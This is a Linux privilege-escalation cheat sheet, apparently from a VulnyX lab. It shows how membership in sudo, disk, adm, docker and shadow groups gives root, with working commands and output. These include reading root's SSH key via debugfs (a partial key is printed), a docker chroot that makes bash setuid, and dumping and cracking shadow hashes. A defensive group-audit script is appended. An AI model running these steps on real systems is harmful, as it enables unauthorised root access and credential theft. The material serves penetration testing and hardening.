Linux Groups
Linux (Privilege Escalation)
sudo
Detect
low@vulnyx:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),27(sudo)
Abuse
low@vulnyx:~$ sudo su
root@vulnyx:~# id
uid=0(root) gid=0(root) groups=0(root)
disk
Detect
low@vulnyx:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),6(disk)
Abuse
low@vulnyx:~$ df -h
Filesystem Size Used Avail Use% Mounted on
udev 480M 0 480M 0% /dev
tmpfs 99M 3.2M 96M 4% /run
/dev/sda1 11G 2.2G 8.1G 21% /
tmpfs 494M 0 494M 0% /dev/shm
low@vulnyx:~$ /usr/sbin/debugfs /dev/sda1
debugfs 1.44.5 (15-Dec-2018)
debugfs: ls /root
debugfs: ls /root/.ssh/
debugfs: cat /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAstkGmc1W+epM0w13VQrLO/wMNWwxFltotpa9elYJVXSlBc+PgF6I
adm
Detect
low@vulnyx:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),4(adm)
Abuse
low@vulnyx:~$ grep --color -Eri "pass|password" /var/log 2>/dev/null
docker
Detect
low@vulnyx:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),109(docker)
Abuse
low@vulnyx:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# chmod 4755 /bin/bash
# exit
low@vulnyx:~$ /bin/bash -pi
lxd
shadow
Detect
low@vulnyx:~$ id
uid=1000(user) gid=1000(user) grupos=1000(user),42(shadow)
low@vulnyx:~$ ls -l /etc/shadow
-rw-r----- 1 root shadow 719 mar 27 08:04 /etc/shadow
Abuse
low@vulnyx:~$ cat /etc/shadow | grep "\$y" | awk -F: '{print $1":"$2}'
root:$y$j9T$IwIIKD8L9jCb0lqWAWgB/0$OBiTPAluE/7llChagMz3WMBQR9ws4v1OWPwk/SyHqzD
user:$y$j9T$JT/GEG2SlAAxdRYVRwob0.$P/Nsg/JHeFdXy1/.MDUDbcHKUAe8BeEXVrsQJm1.T7/
Hash Cracking
❯ john --wordlist=/opt/rockyou.txt crack --format=crypt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
rockyou (root)
123456 (user)
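Each Detect step above checks a single account with id; the check an administrator wants is the reverse one, every account that sits in any of these groups. The script below is an added example, not part of the original notes: it parses /etc/group (and the primary gid field of /etc/passwd, which id also reports) and lists members of the groups this page walks through. The sample file contents are constructed to mirror the page's id output.

```python
# Added example, not from the original notes: list every account in the groups
# this page covers, from /etc/group plus the primary gid field of /etc/passwd.
from collections import defaultdict

PRIVILEGED_GROUPS = {"sudo", "disk", "adm", "docker", "lxd", "shadow"}

def parse_group(text):
    """Return {group: (gid, set of supplementary members)} from /etc/group text."""
    groups = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            name, _pw, gid, members = line.split(":", 3)
            groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups

def audit_privileged_groups(group_text, passwd_text, watch=PRIVILEGED_GROUPS):
    """Map each watched group to a sorted list of its members.
    `id` reports supplementary groups (/etc/group) and the primary group
    (gid field of /etc/passwd); a primary gid of 6 is disk access as well.
    """
    groups = parse_group(group_text)
    gid_to_name = {gid: name for name, (gid, _) in groups.items()}
    findings = defaultdict(set)
    for name, (_gid, members) in groups.items():
        if name in watch:
            findings[name] |= members
    for line in passwd_text.splitlines():
        if line and not line.startswith("#"):
            user, _pw, _uid, gid = line.split(":")[:4]
            name = gid_to_name.get(int(gid))
            if name in watch:
                findings[name].add(user)
    return {g: sorted(u) for g, u in findings.items() if u}

# Constructed sample mirroring the page's `id` output for the low and user accounts.
SAMPLE_GROUP = """adm:x:4:low
disk:x:6:low
sudo:x:27:low
shadow:x:42:user
docker:x:109:low
lxd:x:110:
"""
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
low:x:1000:1000::/home/low:/bin/bash
user:x:1001:1001::/home/user:/bin/bash
"""

if __name__ == "__main__":  # on a live host pass open("/etc/group").read() etc.
    for group, users in sorted(audit_privileged_groups(SAMPLE_GROUP, SAMPLE_PASSWD).items()):
        print(f"{group}: {', '.join(users)}")
```

Groups with no members (lxd in the sample) are omitted from the report, so any group that does appear is an account to review or remove.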